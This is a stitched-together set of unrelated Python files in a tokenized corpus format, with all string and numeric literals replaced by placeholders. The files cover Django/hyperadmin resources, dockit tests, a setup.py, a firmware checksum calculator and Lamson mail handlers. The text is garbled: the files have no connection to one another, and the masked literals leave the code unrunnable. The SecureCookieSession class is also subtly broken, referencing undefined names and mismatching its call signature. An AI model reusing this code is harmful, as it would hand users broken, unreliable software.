'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . core . urlresolvers import reverse <EOL> class Breadcrumb ( object ) : <EOL> def __init__ ( self , name , url = None ) : <EOL> self . name = name <EOL> self . url = url <EOL> def get_absolute_url ( self ) : <EOL> if not isinstance ( self . url , basestring ) : <EOL> if len ( self . url ) > <NUM_LIT:1> : <EOL> return reverse ( self . url [ <NUM_LIT:0> ] , args = self . url [ <NUM_LIT:1> ] , kwargs = self . url [ <NUM_LIT:2> ] ) <EOL> return reverse ( * self . url ) <EOL> return self . url </s>
<s> class BaseDocumentQuery ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , query_index , backend = None ) : <EOL> self . query_index = query_index <EOL> self . _backend = backend <EOL> @ property <EOL> def document ( self ) : <EOL> return self . query_index . document <EOL> @ property <EOL> def backend ( self ) : <EOL> if self . _backend : <EOL> return self . _backend <EOL> return self . document . _meta . get_index_backend_for_read ( self . query_index ) <EOL> def _get_indexer_for_operation ( self , document , op ) : <EOL> return self . backend . _get_indexer_for_operation ( document , op ) <EOL> def __len__ ( self ) : <EOL> raise NotImplementedError <EOL> def count ( self ) : <EOL> return self . __len__ ( ) <EOL> def exists ( self ) : <EOL> return bool ( self . __len__ ( ) ) <EOL> def delete ( self ) : <EOL> raise NotImplementedError <EOL> def get ( self , ** kwargs ) : <EOL> filter_operations = self . query_index . _parse_kwargs ( kwargs ) <EOL> return self . get_from_filter_operations ( filter_operations ) <EOL> def get_from_filter_operations ( self , filter_operations ) : <EOL> raise NotImplementedError <EOL> def values ( self , * limit_to , ** kwargs ) : <EOL> raise NotImplementedError <EOL> def __getitem__ ( self , val ) : <EOL> raise NotImplementedError <EOL> def __nonzero__ ( self ) : <EOL> raise NotImplementedError <EOL> class QuerySet ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , query ) : <EOL> self . query = query <EOL> @ property <EOL> def document ( self ) : <EOL> return self . query . document <EOL> def __len__ ( self ) : <EOL> return self . query . __len__ ( ) <EOL> def count ( self ) : <EOL> return self . __len__ ( ) <EOL> def delete ( self ) : <EOL> return self . query . delete ( ) <EOL> def values ( self , * limit_to , ** kwargs ) : <EOL> return self . query . values ( * limit_to , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> return self . query . get ( ** kwargs ) <EOL> def exists ( self ) : <EOL> return self . query . exists ( ) <EOL> def __getitem__ ( self , val ) : <EOL> return self . query . __getitem__ ( val ) <EOL> def __nonzero__ ( self ) : <EOL> return self . query . __nonzero__ ( ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . query ) </s>
<s> from django . utils import unittest <EOL> from django . test . client import RequestFactory <EOL> from django . contrib . auth . models import User <EOL> from django . contrib import admin <EOL> from dockit . admin . documentadmin import DocumentAdmin , SchemaAdmin <EOL> from common import SimpleDocument , SimpleSchema <EOL> class MockView : <EOL> def __init__ ( self , request ) : <EOL> self . request = request <EOL> def dotpath ( self ) : <EOL> return None <EOL> def next_dotpath ( self ) : <EOL> return None <EOL> class AdminFormFieldTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . admin_model = DocumentAdmin ( SimpleDocument , admin . site , schema = SimpleDocument ) <EOL> self . schema_model = SchemaAdmin ( SimpleDocument , admin . site , schema = SimpleSchema , documentadmin = self . admin_model ) <EOL> self . factory = RequestFactory ( ) <EOL> User . objects . all ( ) . delete ( ) <EOL> self . super_user = User . objects . create ( is_staff = True , is_active = True , is_superuser = True , username = '<STR_LIT>' ) <EOL> def test_formfield_for_field_with_complex_list_field ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> prop = SimpleDocument . _meta . fields [ '<STR_LIT>' ] <EOL> field = prop . get_form_field_class ( ) <EOL> kwargs = prop . formfield_kwargs ( ) <EOL> kwargs [ '<STR_LIT>' ] = request <EOL> view = MockView ( request ) <EOL> admin_field = self . admin_model . formfield_for_field ( prop , field , view , ** kwargs ) <EOL> field_html = admin_field . widget . render ( '<STR_LIT>' , [ ] ) <EOL> self . assertTrue ( '<STR_LIT>' in field_html ) <EOL> def test_inline_form_field_for_field_with_complex_list_field ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> instances = self . admin_model . get_default_inline_instances ( ) <EOL> self . assertEqual ( len ( instances ) , <NUM_LIT:1> ) <EOL> inline_admin = instances [ <NUM_LIT:0> ] <EOL> prop = inline_admin . schema . _meta . fields [ '<STR_LIT>' ] <EOL> field = prop . get_form_field_class ( ) <EOL> kwargs = prop . formfield_kwargs ( ) <EOL> kwargs [ '<STR_LIT>' ] = request <EOL> view = MockView ( request ) <EOL> admin_field = inline_admin . formfield_for_field ( prop , field , view , ** kwargs ) <EOL> assert admin_field . dotpath , str ( admin_field . dotpath ) <EOL> field_html = admin_field . widget . render ( '<STR_LIT>' , [ ] ) <EOL> self . assertTrue ( '<STR_LIT>' in field_html ) <EOL> def test_inline_get_formset ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> instances = self . admin_model . get_default_inline_instances ( ) <EOL> self . assertEqual ( len ( instances ) , <NUM_LIT:1> ) <EOL> view = MockView ( request ) <EOL> inline_admin = instances [ <NUM_LIT:0> ] <EOL> formset = inline_admin . get_formset ( request , view = view ) <EOL> html = list ( ) <EOL> for form in formset ( instance = SimpleDocument ( ) ) : <EOL> assert form . _meta . formfield_callback <EOL> html . append ( form . as_table ( ) ) <EOL> html = '<STR_LIT:\n>' . join ( html ) <EOL> self . assertTrue ( '<STR_LIT>' in html , html ) </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:.>' ) ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> from hyperadmin import get_version <EOL> version = get_version ( include_sub = False ) <EOL> release = get_version ( ) <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> autodoc_member_order = '<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> import io <EOL> from django import http <EOL> from datatap . datataps import StreamDataTap <EOL> from hyperadmin . mediatypes . common import MediaType <EOL> class DataTap ( MediaType ) : <EOL> def __init__ ( self , api_request , datatap_class , ** kwargs ) : <EOL> self . datatap_class = datatap_class <EOL> super ( DataTap , self ) . __init__ ( api_request , ** kwargs ) <EOL> def get_content ( self , form_link , state ) : <EOL> instream = state . get_resource_items ( ) <EOL> datatap = state . endpoint . get_datatap ( instream = instream ) <EOL> serialized_dt = self . datatap_class ( instream = datatap ) <EOL> payload = io . BytesIO ( ) <EOL> serialized_dt . send ( payload ) <EOL> return payload . getvalue ( ) <EOL> def serialize ( self , content_type , link , state ) : <EOL> if self . detect_redirect ( link ) : <EOL> return self . handle_redirect ( link , content_type ) <EOL> content = self . get_content ( link , state ) <EOL> response = http . HttpResponse ( content , content_type ) <EOL> return response <EOL> def get_datatap ( self , request ) : <EOL> if hasattr ( request , '<STR_LIT:body>' ) : <EOL> payload = request . body <EOL> else : <EOL> payload = request . raw_post_data <EOL> return self . datatap_class ( StreamDataTap ( io . BytesIO ( payload ) ) ) <EOL> def deserialize ( self , request ) : <EOL> datatap = self . get_datatap ( request ) <EOL> data = list ( datatap ) [ <NUM_LIT:0> ] <EOL> return { '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : request . FILES , } </s>
<s> from django . conf . urls . defaults import patterns , url , include <EOL> from django import forms <EOL> from hyperadmin . apirequests import Namespace <EOL> from hyperadmin . resources . crud import CRUDResource <EOL> from hyperadmin . resources . models . indexes import ModelIndex , InlineIndex <EOL> from hyperadmin . resources . models . endpoints import ListEndpoint , CreateEndpoint , DetailEndpoint , DeleteEndpoint <EOL> from hyperadmin . resources . models . endpoints import InlineListEndpoint , InlineCreateEndpoint , InlineDetailEndpoint , InlineDeleteEndpoint <EOL> class BaseModelResource ( CRUDResource ) : <EOL> fields = None <EOL> exclude = [ ] <EOL> formfield_overrides = { } <EOL> inlines = [ ] <EOL> list_display_links = ( ) <EOL> list_filter = ( ) <EOL> list_select_related = False <EOL> list_per_page = <NUM_LIT:100> <EOL> list_max_show_all = <NUM_LIT:200> <EOL> list_editable = ( ) <EOL> search_fields = ( ) <EOL> date_hierarchy = None <EOL> @ property <EOL> def opts ( self ) : <EOL> return self . resource_adaptor . _meta <EOL> def get_app_name ( self ) : <EOL> return self . opts . app_label <EOL> def get_resource_name ( self ) : <EOL> return self . opts . module_name <EOL> def get_primary_query ( self , ** kwargs ) : <EOL> return self . get_queryset ( ) <EOL> def get_indexes ( self ) : <EOL> from hyperadmin . resources . models . filters import FieldFilter , SearchFilter <EOL> from django . db import models <EOL> from django . contrib . admin . util import get_fields_from_path <EOL> try : <EOL> from django . contrib . admin . util import lookup_needs_distinct <EOL> except ImportError : <EOL> from hyperadmin . resources . models . util import lookup_needs_distinct <EOL> indexes = { '<STR_LIT>' : ModelIndex ( '<STR_LIT>' , self ) } <EOL> index = ModelIndex ( '<STR_LIT>' , self ) <EOL> indexes [ '<STR_LIT>' ] = index <EOL> if self . list_filter : <EOL> for list_filter in self . list_filter : <EOL> use_distinct = False <EOL> if callable ( list_filter ) : <EOL> spec = list_filter ( index = index ) <EOL> else : <EOL> field_path = None <EOL> if isinstance ( list_filter , ( tuple , list ) ) : <EOL> field , field_list_filter_class = list_filter <EOL> else : <EOL> field , field_list_filter_class = list_filter , FieldFilter . create <EOL> if not isinstance ( field , models . Field ) : <EOL> field_path = field <EOL> field = get_fields_from_path ( self . model , field_path ) [ - <NUM_LIT:1> ] <EOL> spec = field_list_filter_class ( field , field_path = field_path , index = index ) <EOL> use_distinct = ( use_distinct or <EOL> lookup_needs_distinct ( self . opts , <EOL> field_path ) ) <EOL> if spec : <EOL> index . filters . append ( spec ) <EOL> if self . search_fields : <EOL> index . register_filter ( SearchFilter , search_fields = self . search_fields ) <EOL> '''<STR_LIT>''' <EOL> return indexes <EOL> def lookup_allowed ( self , lookup , value ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def get_queryset ( self ) : <EOL> queryset = self . resource_adaptor . objects . all ( ) <EOL> if not self . has_update_permission ( ) : <EOL> queryset = queryset . none ( ) <EOL> return queryset <EOL> def has_create_permission ( self ) : <EOL> user = self . api_request . user <EOL> if self . opts . auto_created : <EOL> return self . has_update_permission ( ) <EOL> return user . has_perm ( <EOL> self . opts . app_label + '<STR_LIT:.>' + self . opts . get_add_permission ( ) ) <EOL> def has_update_permission ( self , item = None ) : <EOL> user = self . api_request . user <EOL> if item : <EOL> obj = item . instance <EOL> else : <EOL> obj = None <EOL> opts = self . opts <EOL> if opts . auto_created and hasattr ( self , '<STR_LIT>' ) : <EOL> for field in opts . fields : <EOL> if field . rel and field . rel . to != self . parent_model : <EOL> opts = field . rel . to . _meta <EOL> break <EOL> return user . has_perm ( <EOL> opts . app_label + '<STR_LIT:.>' + opts . get_change_permission ( ) , obj ) <EOL> def has_delete_permission ( self , item = None ) : <EOL> user = self . api_request . user <EOL> if self . opts . auto_created : <EOL> return self . has_update_permission ( item ) <EOL> return user . has_perm ( <EOL> self . opts . app_label + '<STR_LIT:.>' + self . opts . get_delete_permission ( ) ) <EOL> def get_exclude ( self ) : <EOL> return self . exclude or [ ] <EOL> def get_form_class ( self ) : <EOL> if self . form_class : <EOL> return self . form_class <EOL> class AdminForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = self . model <EOL> exclude = self . get_exclude ( ) <EOL> return AdminForm <EOL> def get_native_datatap_instream_from_items ( self , items ) : <EOL> '''<STR_LIT>''' <EOL> return [ item . instance for item in items ] <EOL> def get_native_datatap ( self , instream = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> from datatap . datataps import ModelDataTap <EOL> if instream is None : <EOL> instream = [ self . resource_adaptor ] <EOL> return ModelDataTap ( instream , ** kwargs ) <EOL> class ModelResource ( BaseModelResource ) : <EOL> list_endpoint = ( ListEndpoint , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> create_endpoint = ( CreateEndpoint , { } ) <EOL> detail_endpoint = ( DetailEndpoint , { } ) <EOL> delete_endpoint = ( DeleteEndpoint , { } ) <EOL> def post_register ( self ) : <EOL> super ( ModelResource , self ) . post_register ( ) <EOL> self . initialize_inlines ( ) <EOL> @ property <EOL> def model ( self ) : <EOL> return self . resource_adaptor <EOL> def initialize_inlines ( self ) : <EOL> self . inline_instances = list ( ) <EOL> for inline_cls in self . inlines : <EOL> self . register_inline ( inline_cls ) <EOL> def register_inline ( self , inline_cls ) : <EOL> self . inline_instances . append ( inline_cls ( parent = self , api_request = self . api_request ) ) <EOL> def get_urls ( self ) : <EOL> urlpatterns = super ( ModelResource , self ) . get_urls ( ) <EOL> for inline in self . inline_instances : <EOL> urlpatterns += patterns ( '<STR_LIT>' , <EOL> url ( '<STR_LIT>' , include ( inline . urls ) ) <EOL> ) <EOL> return urlpatterns <EOL> def get_item_namespaces ( self , item ) : <EOL> assert self . api_request <EOL> namespaces = super ( ModelResource , self ) . get_item_namespaces ( item ) <EOL> for inline in self . inline_instances : <EOL> name = '<STR_LIT>' % inline . rel_name <EOL> assert inline . api_request <EOL> namespace = Namespace ( name = name , endpoint = inline , state_data = { '<STR_LIT>' : item } ) <EOL> assert '<STR_LIT>' in namespace . endpoint . state <EOL> namespace . link <EOL> namespaces [ name ] = namespace <EOL> return namespaces <EOL> class InlineModelResource ( BaseModelResource ) : <EOL> model = None <EOL> fk_name = None <EOL> rel_name = None <EOL> list_endpoint = ( InlineListEndpoint , { } ) <EOL> create_endpoint = ( InlineCreateEndpoint , { } ) <EOL> detail_endpoint = ( InlineDetailEndpoint , { } ) <EOL> delete_endpoint = ( InlineDeleteEndpoint , { } ) <EOL> def __init__ ( self , parent , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = parent . site <EOL> kwargs [ '<STR_LIT>' ] = self . model <EOL> kwargs [ '<STR_LIT>' ] = parent <EOL> super ( InlineModelResource , self ) . __init__ ( ** kwargs ) <EOL> def post_register ( self ) : <EOL> from django . db . models . fields . related import RelatedObject <EOL> from django . forms . models import _get_foreign_key <EOL> self . fk = _get_foreign_key ( self . _parent . resource_adaptor , self . model , self . fk_name ) <EOL> if self . rel_name is None : <EOL> self . rel_name = RelatedObject ( self . fk . rel . to , self . model , self . fk ) . get_accessor_name ( ) <EOL> super ( InlineModelResource , self ) . post_register ( ) <EOL> def get_queryset ( self , parent ) : <EOL> queryset = self . resource_adaptor . objects . all ( ) <EOL> queryset = queryset . filter ( ** { self . fk . name : parent } ) <EOL> if not self . has_update_permission ( ) : <EOL> queryset = queryset . none ( ) <EOL> return queryset <EOL> def get_primary_query ( self , ** kwargs ) : <EOL> return self . get_queryset ( parent = self . state [ '<STR_LIT>' ] . instance ) <EOL> def get_indexes ( self ) : <EOL> return { '<STR_LIT>' : InlineIndex ( '<STR_LIT>' , self ) } <EOL> def get_base_url_name_suffix ( self ) : <EOL> assert self . rel_name is not None <EOL> return self . rel_name <EOL> def get_item_url ( self , item ) : <EOL> return self . link_prototypes [ '<STR_LIT>' ] . get_url ( item = item ) <EOL> def get_absolute_url ( self ) : <EOL> return self . link_prototypes [ '<STR_LIT:list>' ] . get_url ( ) <EOL> def get_breadcrumbs ( self ) : <EOL> breadcrumbs = self . parent . get_breadcrumbs ( ) <EOL> parent_item = self . state [ '<STR_LIT>' ] <EOL> breadcrumbs . append ( self . parent . get_item_breadcrumb ( parent_item ) ) <EOL> breadcrumbs . append ( self . get_breadcrumb ( ) ) <EOL> if self . state . item : <EOL> breadcrumbs . append ( self . get_item_breadcrumb ( self . state . item ) ) <EOL> return breadcrumbs <EOL> def get_form_class ( self ) : <EOL> if self . form_class : <EOL> return self . form_class <EOL> resource = self <EOL> class AdminForm ( forms . ModelForm ) : <EOL> state = self . state <EOL> def save ( self , commit = True ) : <EOL> instance = super ( AdminForm , self ) . save ( commit = False ) <EOL> setattr ( instance , resource . fk . name , self . state [ '<STR_LIT>' ] . instance ) <EOL> if commit : <EOL> instance . save ( ) <EOL> return instance <EOL> class Meta : <EOL> model = self . model <EOL> exclude = self . get_exclude ( ) + [ self . fk . name ] <EOL> return AdminForm <EOL> def get_ln_links ( self ) : <EOL> links = self . create_link_collection ( ) <EOL> if self . state . namespace : <EOL> for item in self . get_resource_items ( ) : <EOL> links . append ( self . link_prototypes [ '<STR_LIT>' ] . get_link ( item = item ) ) <EOL> return links <EOL> def get_idempotent_links ( self ) : <EOL> links = self . create_link_collection ( ) <EOL> if self . state . namespace : <EOL> for item in self . get_resource_items ( ) : <EOL> links . append ( self . link_prototypes [ '<STR_LIT>' ] . get_link ( item = item ) ) <EOL> return links </s>
<s> import os <EOL> try : <EOL> from setuptools import setup , find_packages <EOL> except ImportError : <EOL> from distutils . core import setup , find_packages <EOL> VERSION = '<STR_LIT>' <EOL> PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> try : <EOL> LONG_DESC = '<STR_LIT>' + open ( os . path . join ( PATH , '<STR_LIT>' ) , '<STR_LIT:r>' ) . read ( ) . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> except IOError : <EOL> LONG_DESC = '<STR_LIT>' <EOL> setup ( name = '<STR_LIT>' , <EOL> version = VERSION , <EOL> description = "<STR_LIT>" , <EOL> long_description = LONG_DESC , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> ) </s>
<s> import sys <EOL> """<STR_LIT>""" <EOL> class LibAcosChecksum ( object ) : <EOL> def __init__ ( self , data , data_len , checksum_offset = - <NUM_LIT:1> ) : <EOL> self . dword_623A0 = <NUM_LIT:0> <EOL> self . dword_623A4 = <NUM_LIT:0> <EOL> fake_checksum = "<STR_LIT>" <EOL> self . data = data [ <NUM_LIT:0> : data_len ] <EOL> if ( checksum_offset > - <NUM_LIT:1> ) : <EOL> self . data = ( self . data [ <NUM_LIT:0> : checksum_offset ] + <EOL> fake_checksum + <EOL> self . data [ checksum_offset + len ( fake_checksum ) : ] ) <EOL> self . _update ( self . data [ <NUM_LIT:0> : data_len ] ) <EOL> self . _finalize ( ) <EOL> def _update ( self , data ) : <EOL> size = len ( data ) <EOL> t0 = self . dword_623A0 <EOL> a0 = self . dword_623A4 <EOL> a2 = size <EOL> a3 = <NUM_LIT:0> <EOL> while a3 != a2 : <EOL> v1 = ord ( data [ a3 ] ) <EOL> a3 += <NUM_LIT:1> <EOL> a0 = ( a0 + v1 ) & <NUM_LIT> <EOL> t0 = ( t0 + a0 ) & <NUM_LIT> <EOL> self . dword_623A0 = t0 <EOL> self . dword_623A4 = a0 <EOL> return <NUM_LIT:1> <EOL> def _finalize ( self ) : <EOL> v0 = self . dword_623A0 <EOL> v1 = self . dword_623A4 <EOL> a0 = ( v0 & <NUM_LIT> ) <EOL> v0 = ( v0 >> <NUM_LIT:16> ) <EOL> v0 = ( v0 + a0 ) & <NUM_LIT> <EOL> a2 = ( v1 & <NUM_LIT> ) <EOL> v1 = ( v1 >> <NUM_LIT:16> ) <EOL> v1 = ( v1 + a2 ) & <NUM_LIT> <EOL> a1 = v0 >> <NUM_LIT:16> <EOL> a1 = ( a1 + v0 ) & <NUM_LIT> <EOL> a0 = v1 >> <NUM_LIT:16> <EOL> a1 = ( a1 & <NUM_LIT> ) <EOL> a0 = ( a0 + v1 ) & <NUM_LIT> <EOL> a0 = ( a0 & <NUM_LIT> ) <EOL> v0 = ( a1 << <NUM_LIT:16> ) & <NUM_LIT> <EOL> a2 = ( v0 | a0 ) <EOL> v0 = a2 <EOL> self . dword_623A4 = a0 <EOL> self . dword_623A0 = a1 <EOL> self . checksum = v0 <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> firmware = sys . argv [ <NUM_LIT:1> ] <EOL> size = int ( sys . argv [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> data = open ( firmware , "<STR_LIT:rb>" ) . read ( ) <EOL> if size > len ( data ) : <EOL> raise Exception ( "<STR_LIT>" % ( size , len ( data ) ) ) <EOL> checksum = LibAcosChecksum ( data , size ) . checksum <EOL> print ( "<STR_LIT>" % checksum ) </s>
<s> from . base import BaseSession <EOL> import hashlib <EOL> from . utils import sign_payload , validate_payload , load_payload , dump_payload <EOL> from . globals import session_config <EOL> class SecureCookieSession ( BaseSession ) : <EOL> salt = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> pass <EOL> def decode_session ( self , data ) : <EOL> validated , ret = validate_payload ( data ) <EOL> if validated : <EOL> return load_payload ( ret ) <EOL> return None <EOL> def encode_session ( self ) : <EOL> s = dump_payload ( data ) <EOL> return sign_payload ( s , session_config . get ( '<STR_LIT>' ) , salt ) <EOL> def open ( self , request ) : <EOL> value = request . get_cookie ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> data = self . decode_session ( value ) or { } <EOL> self . update ( data ) <EOL> def save ( self , response ) : <EOL> data = self . encode_session ( dict ( self ) ) <EOL> response . set_cookie ( '<STR_LIT>' , data ) </s>
<s> from lamson import view , encoding , queue <EOL> from config import settings <EOL> def mail_to_you_is_bouncing ( message ) : <EOL> reason = message . bounce . error_for_humans ( ) <EOL> msg = view . respond ( locals ( ) , '<STR_LIT>' , <EOL> From = '<STR_LIT>' , <EOL> To = message . bounce . original [ '<STR_LIT:to>' ] , <EOL> Subject = "<STR_LIT>" ) <EOL> if message . bounce . report : <EOL> for report in message . bounce . report : <EOL> msg . attach ( '<STR_LIT>' , content_type = '<STR_LIT>' , data = encoding . to_string ( report ) , <EOL> disposition = '<STR_LIT>' ) <EOL> if message . bounce . notification : <EOL> msg . attach ( '<STR_LIT>' , content_type = '<STR_LIT>' , <EOL> data = encoding . to_string ( message . bounce . notification ) , <EOL> disposition = '<STR_LIT>' ) <EOL> return msg <EOL> def you_are_now_unbounced ( message ) : <EOL> msg = view . respond ( locals ( ) , '<STR_LIT>' , <EOL> From = '<STR_LIT>' , <EOL> To = message [ '<STR_LIT>' ] , <EOL> Subject = "<STR_LIT>" ) <EOL> return msg <EOL> def archive_bounce ( message ) : <EOL> qu = queue . Queue ( settings . BOUNCE_ARCHIVE ) <EOL> qu . push ( message ) </s>
<s> from config import settings <EOL> from lamson import view <EOL> from lamson . routing import Router <EOL> from lamson . server import Relay <EOL> import jinja2 <EOL> import logging <EOL> import logging . config <EOL> import os <EOL> logging . config . fileConfig ( "<STR_LIT>" ) <EOL> settings . relay = Relay ( host = settings . relay_config [ '<STR_LIT:host>' ] , <EOL> port = settings . relay_config [ '<STR_LIT:port>' ] , debug = <NUM_LIT:0> ) <EOL> settings . receiver = None <EOL> Router . defaults ( ** settings . router_defaults ) <EOL> Router . load ( settings . handlers ) <EOL> Router . RELOAD = True <EOL> Router . LOG_EXCEPTIONS = False <EOL> view . LOADER = jinja2 . Environment ( <EOL> loader = jinja2 . PackageLoader ( settings . template_config [ '<STR_LIT>' ] , <EOL> settings . template_config [ '<STR_LIT>' ] ) ) </s>
<s> """<STR_LIT>""" </s>
